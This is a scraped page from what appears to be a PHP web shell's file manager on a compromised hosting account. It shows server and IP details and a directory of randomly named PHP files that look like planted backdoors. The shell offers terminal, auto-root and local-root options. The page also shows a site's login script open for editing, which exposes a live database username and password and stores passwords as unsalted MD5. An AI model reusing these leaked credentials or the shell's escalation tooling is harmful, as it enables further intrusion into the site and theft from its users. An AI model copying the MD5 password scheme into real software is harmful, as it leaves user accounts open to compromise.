Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.121
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
findus.36julay.space /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-01-27 18:20
adi
[ DIR ]
drwxr-xr-x
2025-09-05 06:04
.772428730393532.php
760
B
-rw-r--r--
2025-09-04 20:51
96i.php
13.63
KB
-rw-r--r--
2025-08-31 20:53
all.zip
4.05
KB
-rw-r--r--
2025-01-27 18:51
dashboard.php
5.93
KB
-rw-r--r--
2025-01-27 19:00
error_log
17.52
KB
-rw-r--r--
2025-09-04 20:51
goods.php
583
B
-rw-r--r--
2025-09-03 22:50
index.php
3.99
KB
-rw-r--r--
2025-01-27 19:01
logout.php
181
B
-rw-r--r--
2025-01-27 17:06
nxx.php
52.9
KB
-rw-r--r--
2025-08-31 20:47
option.php
61.36
KB
-r--r--r--
2025-08-29 17:47
utfvztvg.php
760
B
-rw-r--r--
2025-08-31 20:43
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
wp-cron.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
x-cp-KHoU3LOW.php
448
B
-rw-r--r--
2025-09-05 11:04
x-cp-cDequjHb.php
448
B
-rw-r--r--
2025-09-05 13:26
Save
Rename
<?php session_start(); $conn = new mysqli('localhost', 'julaysp1_new_site', '[%xZ+Gh$&;(-', 'julaysp1_new_site'); if ($conn->connect_error) { die('Connection failed: ' . $conn->connect_error); } // Initialize session variables for form state if (!isset($_SESSION['step'])) { $_SESSION['step'] = 1; } // Process form submission if ($_SERVER['REQUEST_METHOD'] === 'POST') { if ($_SESSION['step'] === 1) { // Step 1: Validate email $email = $_POST['email']; $stmt = $conn->prepare("SELECT id FROM users WHERE email = ?"); $stmt->bind_param("s", $email); $stmt->execute(); $stmt->store_result(); if ($stmt->num_rows > 0) { $_SESSION['email'] = $email; $_SESSION['step'] = 2; } else { $error = "Email not found. Please try again."; } $stmt->close(); } elseif ($_SESSION['step'] === 2) { // Step 2: Validate password $password = md5($_POST['password']); // Hash the input password with MD5 $email = $_SESSION['email']; // Fetch the stored MD5 hashed password from the database $stmt = $conn->prepare("SELECT password FROM users WHERE email = ?"); $stmt->bind_param("s", $email); $stmt->execute(); $stmt->bind_result($storedPassword); $stmt->fetch(); if ($password === $storedPassword) { // Login successful, redirect to dashboard $_SESSION['loggedin'] = true; $_SESSION['user_email'] = $email; header("Location: dashboard.php"); exit; } else { $error = "Invalid password. Please try again."; } $stmt->close(); } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Login</title> <!-- Bootstrap CSS --> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet"> <style> body { background: #26a58b; min-height: 100vh; display: flex; justify-content: center; align-items: center; color: white; } .form-container { background: rgb(255 255 255 / 29%); border-radius: 15px; padding: 30px; box-shadow: 0 4px 20px rgba(0, 0, 0, 0.2); width: 100%; max-width: 400px; backdrop-filter: blur(15px); } .btn-custom { background: #2575fc; color: white; font-weight: bold; border: none; transition: 0.3s; } .btn-custom:hover { background: #6a11cb; } </style> </head> <body> <div class="form-container"> <h2 class="text-center mb-4"> Contact Us </h2> <?php if (isset($error)): ?> <div class="alert alert-danger text-center"> <?php echo $error; ?> </div> <?php endif; ?> <form method="post"> <?php if ($_SESSION['step'] === 1): ?> <div class="mb-3"> <label for="email" class="form-label">Enter Your Email</label> <input type="email" class="form-control" name="email" id="email" placeholder="example@domain.com" required> </div> <div class="d-grid"> <button type="submit" class="btn btn-custom">Next</button> </div> <?php elseif ($_SESSION['step'] === 2): ?> <div class="mb-3"> <label for="password" class="form-label">Enter Your Password</label> <input type="password" class="form-control" name="password" id="password" placeholder="Your password" required> </div> <div class="d-grid"> <button type="submit" class="btn btn-custom">Login</button> </div> <?php endif; ?> </form> </div> <!-- Bootstrap Bundle with Popper --> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"></script> </body> </html>